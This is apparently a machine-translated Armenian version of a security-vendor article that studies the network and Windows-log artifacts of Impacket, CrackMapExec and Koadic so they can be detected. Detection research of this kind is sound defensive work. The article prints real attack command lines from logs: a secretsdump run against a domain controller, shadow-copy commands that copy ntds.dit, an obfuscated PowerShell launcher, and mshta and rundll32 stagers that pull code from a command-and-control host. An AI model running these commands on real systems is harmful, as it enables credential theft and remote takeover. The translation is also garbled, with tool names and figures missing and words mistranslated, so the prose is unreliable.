Կորպորատիվ հատվածում հարձակումների թիվը տարեցտարի աճում է. օրինակ քան 2016թ., իսկ 2018թ. քան նախորդ ժամանակահատվածում։ Ներառյալ նրանք, որտեղ հիմնական աշխատանքային գործիքը Windows օպերացիոն համակարգն է։ 2017-2018 թվականներին APT Dragonfly, APT28, հարձակումներ է իրականացրել Եվրոպայում, Հյուսիսային Ամերիկայում և Սաուդյան Արաբիայում կառավարական և ռազմական կազմակերպությունների վրա։ Եվ դրա համար մենք օգտագործեցինք երեք գործիք. , и . Նրանց սկզբնական կոդը բաց է և հասանելի GitHub-ում:
Հարկ է նշել, որ այս գործիքները օգտագործվում են ոչ թե նախնական ներթափանցման, այլ ենթակառուցվածքի ներսում հարձակում զարգացնելու համար: Հարձակվողները դրանք օգտագործում են հարձակման տարբեր փուլերում՝ հետևելով պարագծի ներթափանցմանը: Սա, ի դեպ, դժվար է հայտնաբերել և հաճախ միայն տեխնոլոգիայի օգնությամբ կամ գործիքներ, որոնք թույլ են տալիս . Գործիքներն ապահովում են մի շարք գործառույթներ՝ ֆայլերի փոխանցումից մինչև ռեեստրի հետ փոխազդեցություն և հեռավոր մեքենայի վրա հրամանների կատարում: Մենք այս գործիքների ուսումնասիրություն ենք անցկացրել՝ որոշելու դրանց ցանցային ակտիվությունը:
Այն, ինչ մենք պետք է անեինք.
- Հասկացեք, թե ինչպես են աշխատում հաքերային գործիքները. Պարզեք, թե ինչ պետք է օգտագործեն հարձակվողները և ինչ տեխնոլոգիաներ կարող են օգտագործել:
- Գտեք այն, ինչը չի հայտնաբերվում տեղեկատվական անվտանգության գործիքների կողմից հարձակման առաջին փուլերում. Հետախուզական փուլը կարող է բաց թողնել կամ այն պատճառով, որ հարձակվողը ներքին հարձակվող է, կամ այն պատճառով, որ հարձակվողը շահագործում է ենթակառուցվածքի մի անցք, որը նախկինում հայտնի չէր: Հնարավոր է դառնում վերականգնել նրա գործողությունների ամբողջ շղթան, այստեղից էլ՝ հետագա շարժումը հայտնաբերելու ցանկությունը։
- Վերացնել կեղծ պոզիտիվները ներխուժման հայտնաբերման գործիքներից. Չպետք է մոռանալ, որ երբ որոշակի գործողություններ են հայտնաբերվում միայն հետախուզության հիման վրա, հնարավոր են հաճախակի սխալներ։ Սովորաբար ենթակառուցվածքներում առկա են բավարար քանակությամբ, առաջին հայացքից օրինական ճանապարհներից չտարբերվող ցանկացած տեղեկատվություն ստանալու համար։
Ի՞նչ են տալիս այս գործիքները հարձակվողներին: Եթե սա Impacket-ն է, ապա հարձակվողները ստանում են մոդուլների մեծ գրադարան, որոնք կարող են օգտագործվել գրոհի տարբեր փուլերում, որոնք հաջորդում են պարագիծը կոտրելուց հետո: Շատ գործիքներ ներսում օգտագործում են Impacket մոդուլները, օրինակ՝ Metasploit: Այն ունի dcomexec և wmiexec՝ հրամանների հեռակա կատարման համար, secretsdump՝ հաշիվներ ստանալու համար, որոնք ավելացվել են Impacket-ից: Արդյունքում, նման գրադարանի գործունեության ճիշտ հայտնաբերումը կապահովի ածանցյալների հայտնաբերումը:
Պատահական չէ, որ ստեղծողները գրել են «Powered by Impacket» CrackMapExec (կամ պարզապես CME) մասին: Բացի այդ, CME-ն ունի պատրաստի ֆունկցիոնալություն հանրաճանաչ սցենարների համար՝ Mimikatz՝ գաղտնաբառեր կամ դրանց հեշեր ստանալու համար, Meterpreter-ի կամ Empire գործակալի ներդրում հեռահար կատարման համար և Bloodhound-ի վրա:
Երրորդ գործիքը, որը մենք ընտրեցինք, Koadic-ն էր: Այն բոլորովին վերջերս է, ներկայացվել է 25 թվականին DEFCON 2017 հաքերների միջազգային կոնֆերանսին և առանձնանում է ոչ ստանդարտ մոտեցմամբ՝ աշխատում է HTTP, Java Script և Microsoft Visual Basic Script (VBS) միջոցով։ Այս մոտեցումը կոչվում է ապրել հողից դուրս. գործիքն օգտագործում է Windows-ում ներկառուցված կախվածությունների և գրադարանների մի շարք: Ստեղծողները այն անվանում են COM Command & Control կամ C3:
IMPACKET
Impacket-ի ֆունկցիոնալությունը շատ լայն է՝ սկսած AD-ի ներսում հետախուզումից և ներքին MS SQL սերվերներից տվյալների հավաքումից մինչև հավատարմագրերի ստացման տեխնիկա. սա SMB ռելե հարձակում է և տիրույթի վերահսկիչից օգտվողի գաղտնաբառերի հեշեր պարունակող ntds.dit ֆայլի ստացում: Impacket-ը նաև հեռակա կարգով կատարում է հրամաններ՝ օգտագործելով չորս տարբեր մեթոդներ՝ WMI, Windows Scheduler Management Service, DCOM և SMB, և դա անելու համար պահանջում է հավատարմագրեր:
Secretsdump
Եկեք նայենք secretsdump-ին: Սա մոդուլ է, որը կարող է թիրախավորել ինչպես օգտագործողի մեքենաները, այնպես էլ տիրույթի վերահսկիչները: Այն կարող է օգտագործվել LSA, SAM, SECURITY, NTDS.dit հիշողության տարածքների պատճենները ձեռք բերելու համար, ուստի այն կարելի է տեսնել հարձակման տարբեր փուլերում: Մոդուլի գործարկման առաջին քայլը նույնականացումն է SMB-ի միջոցով, որը պահանջում է կամ օգտագործողի գաղտնաբառը կամ դրա հեշը, որպեսզի ավտոմատ կերպով իրականացնի Pass the Hash հարձակումը: Հաջորդը գալիս է ծառայության վերահսկման մենեջեր (SCM) մուտք գործելու և ռեեստր մուտք գործելու խնդրանքը winreg արձանագրության միջոցով, որի միջոցով հարձակվողը կարող է պարզել հետաքրքրության ճյուղերի տվյալները և արդյունքներ ստանալ SMB-ի միջոցով:
Նկ. 1 մենք տեսնում ենք, թե ինչպես ճիշտ winreg արձանագրությունն օգտագործելիս մուտք է ձեռք բերվում՝ օգտագործելով ռեեստրի բանալի LSA-ով: Դա անելու համար օգտագործեք DCERPC հրամանը opcode 15 - OpenKey:
Բրինձ. 1. Ռեեստրի բանալի բացում winreg արձանագրության միջոցով
Հաջորդը, երբ ձեռք է բերվում մուտք դեպի բանալի, արժեքները պահվում են SaveKey հրամանով opcode 20-ով: Impacket-ը դա անում է շատ կոնկրետ ձևով: Այն պահպանում է արժեքները մի ֆայլում, որի անունը 8 պատահական նիշերից բաղկացած տող է, որը կցված է .tmp-ով: Բացի այդ, այս ֆայլի հետագա վերբեռնումը տեղի է ունենում SMB-ի միջոցով System32 գրացուցակից (նկ. 2):
Բրինձ. 2. Հեռավոր մեքենայից ռեեստրի բանալի ստանալու սխեմա
Պարզվում է, որ ցանցում նման ակտիվությունը կարելի է հայտնաբերել ռեգիստրի որոշակի մասնաճյուղերին ուղղված հարցումներով՝ օգտագործելով winreg արձանագրությունը, կոնկրետ անունները, հրամանները և դրանց հերթականությունը:
Այս մոդուլը նաև հետքեր է թողնում Windows-ի իրադարձությունների մատյանում՝ հեշտացնելով այն հայտնաբերելը: Օրինակ՝ հրամանի կատարման արդյունքում
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCWindows Server 2016 մատյանում մենք կտեսնենք իրադարձությունների հետևյալ հիմնական հաջորդականությունը.
1. 4624 - հեռավոր մուտք:
2. 5145 - ստուգում է winreg հեռակառավարման ծառայության մուտքի իրավունքները:
3. 5145 - System32 գրացուցակում ֆայլերի մուտքի իրավունքի ստուգում: Ֆայլն ունի վերը նշված պատահական անվանումը:
4. 4688 - ստեղծելով cmd.exe գործընթաց, որը գործարկում է vssadmin:
“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - ստեղծելով գործընթաց հրամանով.
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - ստեղծելով գործընթաց հրամանով.
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - ստեղծելով գործընթաց հրամանով.
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Ինչպես շատ հետշահագործման գործիքներ, Impacket-ն ունի հրամանների հեռակա կատարման մոդուլներ: Մենք կենտրոնանալու ենք smbexec-ի վրա, որն ապահովում է ինտերակտիվ հրամանի վահանակ հեռավոր մեքենայի վրա: Այս մոդուլը նաև պահանջում է նույնականացում SMB-ի միջոցով՝ կա՛մ գաղտնաբառով, կա՛մ գաղտնաբառի հեշով: Նկ. Նկար 3-ում մենք տեսնում ենք մի օրինակ, թե ինչպես է աշխատում նման գործիքը, այս դեպքում դա տեղական ադմինիստրատորի վահանակն է:
Բրինձ. 3. Ինտերակտիվ smbexec կոնսոլ
Նույնականացումից հետո smbexec-ի առաջին քայլը SCM-ի բացումն է OpenSCManagerW հրամանով (15): Հարցումը ուշագրավ է. MachineName դաշտը DUMMY է:
Բրինձ. 4. Ծառայությունների վերահսկման կառավարչի բացման հարցում
Հաջորդը, ծառայությունը ստեղծվում է CreateServiceW հրամանի միջոցով (12): Smbexec-ի դեպքում մենք ամեն անգամ կարող ենք տեսնել նույն հրամանի կառուցման տրամաբանությունը։ Նկ. 5 կանաչը ցույց է տալիս հրամանի անփոփոխ պարամետրերը, դեղինը ցույց է տալիս, թե ինչ կարող է փոխել հարձակվողը: Հեշտ է տեսնել, որ գործարկվող ֆայլի անունը, նրա գրացուցակը և ելքային ֆայլը կարող են փոխվել, բայց մնացածը շատ ավելի դժվար է փոխել՝ առանց Impacket մոդուլի տրամաբանությունը խախտելու։
Բրինձ. 5. Ծառայություն ստեղծելու հարցում՝ օգտագործելով Service Control Manager-ը
Smbexec-ը նաև ակնհայտ հետքեր է թողնում Windows-ի իրադարձությունների մատյանում։ Windows Server 2016 տեղեկամատյանում ipconfig հրամանով ինտերակտիվ հրամանի վահանակի համար մենք կտեսնենք իրադարձությունների հետևյալ հիմնական հաջորդականությունը.
1. 4697 — ծառայության տեղադրում զոհի մեքենայի վրա.
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - cmd.exe գործընթացի ստեղծում 1-ին կետի փաստարկներով:
3. 5145 - C$ գրացուցակում __output ֆայլի մուտքի իրավունքի ստուգում:
4. 4697 — ծառայության տեղադրում զոհի մեքենայի վրա։
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - cmd.exe գործընթացի ստեղծում 4-ին կետի փաստարկներով:
6. 5145 - C$ գրացուցակում __output ֆայլի մուտքի իրավունքի ստուգում:
Impacket-ը հարձակման գործիքների մշակման հիմքն է: Այն աջակցում է Windows-ի ենթակառուցվածքի գրեթե բոլոր արձանագրություններին և միևնույն ժամանակ ունի իր բնորոշ հատկանիշները: Ահա կոնկրետ winreg հարցումներ և SCM API-ի օգտագործումը բնորոշ հրամանների ձևավորմամբ, և ֆայլի անվան ձևաչափով և SMB-ի համօգտագործման SYSTEM32-ով:
CRACKMAPEXEC
CME գործիքը նախատեսված է հիմնականում ավտոմատացնելու այն սովորական գործողությունները, որոնք հարձակվողը պետք է կատարի ցանցի ներսում առաջխաղացման համար: Այն թույլ է տալիս աշխատել հայտնի Empire գործակալի և Meterpreter-ի հետ համատեղ: Հրամանները թաքնված կատարելու համար CME-ն կարող է մթագնել դրանք: Օգտագործելով Bloodhound-ը (առանձին հետախուզական գործիք) հարձակվողը կարող է ավտոմատացնել տիրույթի ակտիվ ադմինիստրատորի նիստի որոնումը:
խուզարկու շուն
Bloodhound-ը, որպես ինքնուրույն գործիք, թույլ է տալիս կատարել առաջադեմ հետախուզություն ցանցի ներսում: Այն հավաքում է տվյալներ օգտվողների, մեքենաների, խմբերի, նիստերի մասին և տրամադրվում է որպես PowerShell սկրիպտ կամ երկուական ֆայլ: Տեղեկատվություն հավաքելու համար օգտագործվում են LDAP կամ SMB վրա հիմնված արձանագրություններ: CME ինտեգրման մոդուլը թույլ է տալիս Bloodhound-ին ներբեռնել զոհի մեքենան, գործարկել և ստանալ հավաքագրված տվյալները գործարկումից հետո՝ դրանով իսկ ավտոմատացնելով համակարգում գործողությունները և դարձնելով դրանք ավելի քիչ նկատելի: Bloodhound գրաֆիկական կեղևը հավաքագրված տվյալները ներկայացնում է գրաֆիկների տեսքով, ինչը թույլ է տալիս գտնել հարձակվողի մեքենայից մինչև տիրույթի ադմինիստրատոր ամենակարճ ճանապարհը:
Բրինձ. 6. Bloodhound ինտերֆեյս
Տուժողի մեքենայի վրա աշխատելու համար մոդուլը ստեղծում է առաջադրանք՝ օգտագործելով ATSVC և SMB: ATSVC-ն Windows Task Scheduler-ի հետ աշխատելու ինտերֆեյս է: CME-ն օգտագործում է իր NetrJobAdd(1) ֆունկցիան ցանցում առաջադրանքներ ստեղծելու համար: Օրինակ, թե ինչ է ուղարկում CME մոդուլը, ցույց է տրված Նկ. 7. Սա cmd.exe հրամանի կանչ է և խճճված կոդ XML ձևաչափով փաստարկների տեսքով:
Նկ.7. Առաջադրանքի ստեղծում CME-ի միջոցով
Այն բանից հետո, երբ առաջադրանքը ներկայացվել է կատարման, զոհի մեքենան ինքն է գործարկում Bloodhound-ը, և դա կարելի է տեսնել երթևեկության մեջ: Մոդուլը բնութագրվում է LDAP հարցումներով՝ ստանդարտ խմբեր ստանալու համար, տիրույթում գտնվող բոլոր մեքենաների և օգտագործողների ցուցակը, ինչպես նաև SRVSVC NetSessEnum հարցման միջոցով տեղեկատվություն ստանալու ակտիվ օգտատերերի նիստերի մասին:
Բրինձ. 8. SMB-ի միջոցով ակտիվ նիստերի ցուցակի ձեռքբերում
Բացի այդ, Bloodhound-ի գործարկումը զոհի մեքենայի վրա, որի աուդիտը միացված է, ուղեկցվում է ID 4688-ով (գործընթացի ստեղծում) և գործընթացի անվանումով իրադարձությամբ: «C:WindowsSystem32cmd.exe». Դրանում հատկանշական են հրամանի տողի փաստարկները.
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "Enum_avproducts
Enum_avproducts մոդուլը շատ հետաքրքիր է ֆունկցիոնալության և իրականացման տեսանկյունից։ WMI-ն թույլ է տալիս օգտագործել WQL հարցումների լեզուն՝ Windows-ի տարբեր օբյեկտներից տվյալներ ստանալու համար, ինչը, ըստ էության, օգտագործում է այս CME մոդուլը: Այն առաջացնում է հարցումներ AntiSpywareProduct և AntiМirusProduct դասերին զոհի մեքենայի վրա տեղադրված պաշտպանական գործիքների վերաբերյալ: Անհրաժեշտ տվյալներ ստանալու համար մոդուլը միանում է rootSecurityCenter2 անվանատարածքին, այնուհետև ստեղծում է WQL հարցում և ստանում պատասխան։ Նկ. Նկար 9-ը ցույց է տալիս նման հարցումների և պատասխանների բովանդակությունը: Մեր օրինակում հայտնաբերվել է Windows Defender-ը:
Բրինձ. 9. enum_avproducts մոդուլի ցանցային գործունեություն
Հաճախ WMI աուդիտը (Trace WMI-Activity), որի միջոցառումներում կարող եք գտնել օգտակար տեղեկատվություն WQL հարցումների մասին, կարող է անջատված լինել: Բայց եթե այն միացված է, ապա եթե enum_avproducts սկրիպտը գործարկվի, ID 11-ով իրադարձությունը կպահվի: Այն կպարունակի հարցումն ուղարկած օգտվողի անունը և անունը rootSecurityCenter2 անվանատարածքում:
CME մոդուլներից յուրաքանչյուրն ուներ իր արտեֆակտները, լինի դա հատուկ WQL հարցումներ, թե առաջադրանքների ժամանակացույցի որոշակի տեսակի առաջադրանքների ստեղծում՝ խաբեությամբ և Bloodhound-ի հատուկ ակտիվությամբ LDAP-ում և SMB-ում:
KOADIC
Koadic-ի տարբերակիչ առանձնահատկությունը Windows-ում ներկառուցված JavaScript և VBScript թարգմանիչների օգտագործումն է: Այս առումով, այն հետևում է հողի տենդենցին, այսինքն՝ չունի արտաքին կախվածություն և օգտագործում է Windows-ի ստանդարտ գործիքներ: Սա ամբողջական Command & Control (CnC) գործիք է, քանի որ վարակվելուց հետո մեքենայի վրա տեղադրվում է «իմպլանտ», որը թույլ է տալիս կառավարել այն: Նման մեքենան, կոադիկական տերմինաբանությամբ, կոչվում է «զոմբի»։ Եթե տուժածի կողմից լիարժեք շահագործման համար բավարար արտոնություններ չկան, Koadic-ը կարող է դրանք բարձրացնել՝ օգտագործելով Օգտվողի հաշվի վերահսկման շրջանցման (UAC շրջանցում) տեխնիկան:
Բրինձ. 10. Koadic Shell
Տուժողը պետք է հաղորդակցություն սկսի Command & Control սերվերի հետ: Դա անելու համար նա պետք է կապ հաստատի նախկինում պատրաստված URI-ի հետ և ստանա հիմնական Koadic մարմինը՝ օգտագործելով փուլերներից մեկը: Նկ. Նկար 11-ը ցույց է տալիս mshta փուլերի օրինակ:
Բրինձ. 11. CnC սերվերի հետ նիստի սկզբնավորում
WS պատասխան փոփոխականի հիման վրա պարզ է դառնում, որ կատարումը տեղի է ունենում WScript.Shell-ի միջոցով, իսկ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE փոփոխականները պարունակում են հիմնական տեղեկատվություն ընթացիկ սեսիայի պարամետրերի մասին։ Սա CnC սերվերի հետ HTTP կապի առաջին հարցում-պատասխան զույգն է: Հետագա հարցումներն ուղղակիորեն կապված են կոչվող մոդուլների (իմպլանտների) ֆունկցիոնալության հետ։ Բոլոր Koadic մոդուլները աշխատում են միայն CnC-ի հետ ակտիվ նստաշրջանով:
Միմիկաց
Ինչպես CME-ն աշխատում է Bloodhound-ի հետ, այնպես էլ Koadic-ը աշխատում է Mimikatz-ի հետ որպես առանձին ծրագիր և ունի այն գործարկելու բազմաթիվ եղանակներ: Ստորև ներկայացված է հարցում-պատասխան զույգ՝ Mimikatz իմպլանտը ներբեռնելու համար:
Բրինձ. 12. Միմիկացը տեղափոխել Կոադիչին
Դուք կարող եք տեսնել, թե ինչպես է փոխվել հարցումի URI ձևաչափը: Այժմ այն պարունակում է արժեք csrf փոփոխականի համար, որը պատասխանատու է ընտրված մոդուլի համար: Ուշադրություն մի դարձրեք նրա անվան վրա. Մենք բոլորս գիտենք, որ CSRF սովորաբար տարբեր կերպ են հասկանում: Պատասխանը եղել է Koadic-ի նույն հիմնական մասը, որին ավելացվել է Միմիկացի հետ կապված ծածկագիրը։ Այն բավականին մեծ է, ուստի եկեք նայենք հիմնական կետերին: Այստեղ մենք ունենք Mimikatz գրադարանը, որը կոդավորված է base64-ում, սերիականացված .NET դաս, որը կներարկի այն, և փաստարկներ՝ գործարկելու Mimikatz-ը: Կատարման արդյունքը փոխանցվում է ցանցի միջոցով պարզ տեքստով:
Բրինձ. 13. Հեռավոր մեքենայի վրա Mimikatz-ի գործարկման արդյունքը
Exec_cmd
Koadic-ն ունի նաև մոդուլներ, որոնք կարող են հրամաններ կատարել հեռակա կարգով: Այստեղ մենք կտեսնենք նույն URI-ի ստեղծման մեթոդը և ծանոթ sid և csrf փոփոխականները: Exec_cmd մոդուլի դեպքում կոդը ավելացվում է մարմնին, որն ի վիճակի է կատարել shell հրամաններ։ Ստորև ներկայացված է CnC սերվերի HTTP պատասխանում պարունակվող այնպիսի կոդը:
Բրինձ. 14. Իմպլանտի կոդը exec_cmd
Ծանոթ WS հատկանիշով GAWTUUGCFI փոփոխականը պահանջվում է կոդի կատարման համար: Իր օգնությամբ իմպլանտը կանչում է կեղևը՝ մշակելով կոդի երկու ճյուղ՝ shell.exec՝ ելքային տվյալների հոսքի վերադարձով և shell.run առանց վերադարձի։
Koadic-ը տիպիկ գործիք չէ, բայց այն ունի իր սեփական արտեֆակտները, որոնց միջոցով կարելի է գտնել օրինական երթևեկության մեջ.
- HTTP հարցումների հատուկ ձևավորում,
- օգտագործելով winHttpRequests API,
- ստեղծելով WScript.Shell օբյեկտ ActiveXObject-ի միջոցով,
- մեծ գործարկվող մարմին:
Սկզբնական կապը նախաձեռնում է ստեյթերը, ուստի Windows-ի իրադարձությունների միջոցով հնարավոր է հայտնաբերել դրա ակտիվությունը։ Mshta-ի համար սա իրադարձություն 4688 է, որը ցույց է տալիս գործընթացի ստեղծումը start հատկանիշով.
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Մինչ Koadic-ը աշխատում է, դուք կարող եք տեսնել այլ 4688 իրադարձություններ, որոնք հիանալի կերպով բնութագրում են այն.
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Արդյունքները
Հողատարածքից ապրելու միտումը դառնում է ժողովրդականություն հանցագործների շրջանում: Նրանք իրենց կարիքների համար օգտագործում են Windows-ում ներկառուցված գործիքներն ու մեխանիզմները: Մենք տեսնում ենք, որ Koadic, CrackMapExec և Impacket հայտնի գործիքները, որոնք հետևում են այս սկզբունքին, ավելի ու ավելի են հայտնվում APT զեկույցներում: Այս գործիքների համար GitHub-ի պատառաքաղների թիվը նույնպես աճում է, և նորերը հայտնվում են (այժմ դրանք արդեն մոտ հազար են): Միտումը դառնում է ժողովրդականություն իր պարզության շնորհիվ. հարձակվողները երրորդ կողմի գործիքների կարիք չունեն, նրանք արդեն գտնվում են զոհերի մեքենաների վրա և օգնում են շրջանցել անվտանգության միջոցները: Մենք կենտրոնանում ենք ցանցային հաղորդակցության ուսումնասիրության վրա. վերը նկարագրված յուրաքանչյուր գործիք թողնում է իր սեփական հետքերը ցանցային տրաֆիկի մեջ. դրանց մանրամասն ուսումնասիրությունը թույլ տվեց մեզ սովորեցնել մեր արտադրանքը հայտնաբերել դրանք, ինչը, ի վերջո, օգնում է հետաքննել նրանց հետ կապված կիբերմիջադեպերի ողջ շղթան:
Բառը:
- Անտոն Տյուրին, PT Expert Security Center, Positive Technologies փորձագիտական ծառայությունների բաժնի ղեկավար
- Եգոր Պոդմոկով, փորձագետ, PT Expert Security Center, Positive Technologies
Source: www.habr.com